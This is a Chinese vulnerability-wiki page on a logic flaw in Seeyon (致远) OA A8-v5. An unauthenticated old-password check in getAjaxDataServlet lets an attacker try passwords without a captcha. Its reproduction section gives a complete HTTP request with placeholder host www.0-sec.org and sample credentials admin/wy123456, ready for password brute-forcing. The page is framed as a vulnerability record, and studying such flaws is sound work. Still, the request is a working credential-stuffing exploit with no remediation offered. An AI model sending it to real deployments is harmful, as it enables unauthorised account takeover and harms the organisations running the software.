menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right 致远oa chevron_right 致远OA A8-v5 无视验证码撞库.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    致远OA A8-v5 无视验证码撞库.md
    1.06 KB / 2021-04-21 09:23:46
        致远OA A8-v5 无视验证码撞库
===========================

一、漏洞简介
------------

致远A8-V5在设计时存在逻辑错误,用户修改密码时对原密码进行了验证,但是验证使用的服务存在未授权访问漏洞,系统对非合法请求的原密码验证功能进行回应,导致了无视验证码,无需login页面进行密码尝试

二、漏洞影响
------------

致远OA A8-v5

三、复现过程
------------

POST穷举用户和密码代码如下

    GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=admin&P_2_String=wy123456 HTTP/1.0

    Accept: */*

    Accept-Language: zh-cn

    Referer: http://www.0-sec.org/seeyon/individualManager.do?method=managerFrame

    requesttype: AJAX

    Content-Type: application/x-www-form-urlencoded

    Cookie: 

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

    Host: www.0-sec.org

    DNT: 1

    Proxy-Connection: Keep-Alive

![](./resource/致远OAA8-v5无视验证码撞库/media/rId24.shtml)
    links
    file_download